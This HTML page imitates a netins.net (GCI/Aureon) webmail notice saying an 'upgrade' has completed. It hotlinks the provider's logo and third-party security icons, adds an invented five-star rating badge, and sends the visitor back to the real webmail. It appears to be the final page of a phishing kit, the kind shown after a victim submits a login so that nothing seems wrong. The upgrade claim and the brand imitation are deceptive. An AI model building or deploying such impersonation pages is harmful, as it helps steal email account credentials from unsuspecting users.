<!DOCTYPE html>
<html>
<head>
	<meta charset="UTF-8">
	<title>GCI webmail upgrade completed</title>
	<link href="style.css" rel="stylesheet">
</head>
<body>

<p>
<p>
<p>
<p>
<div class="login-page">
<div class="form">

<img align="top" alt="netins.net" src="https://webmail.netins.net/brands/593/1480443264229/content/netins.png?s=1480449589" width="200" height="60">
<div style="background-color:Royale Blue">
<h4>Thank You for updating to the latest version!</h4>
</div>
<p>
<a href="https://webmail.netins.net/?_task=mail&_mbox=INBOX"><button>Go back to webmail</button></a>

  </p>
</form>
<img align="middle" alt="netins.net" src="https://media1.giphy.com/media/EsnrZwq9UKGRi/giphy.gif"height="90" width="120">
<img align="middle" alt="netins.net" src="https://www.cogeco.ca/sites/default/files/icons/securityServices_s.png"height="50" width="60">
   <div class="stars">
                        <i class="iii iii-star-fill"></i>
                        <i class="iii iii-star-fill"></i>
                        <i class="iii iii-star-fill"></i>
                        <i class="iii iii-star-fill"></i>
                        <i class="iii iii-star-fill"></i>
                    </div>
                
										<span class="fn">© 2020 Aureon</span><br>
										<span class="customer-service-rating">
												Over 5,800 5 Star Ratings Per Month
										</span>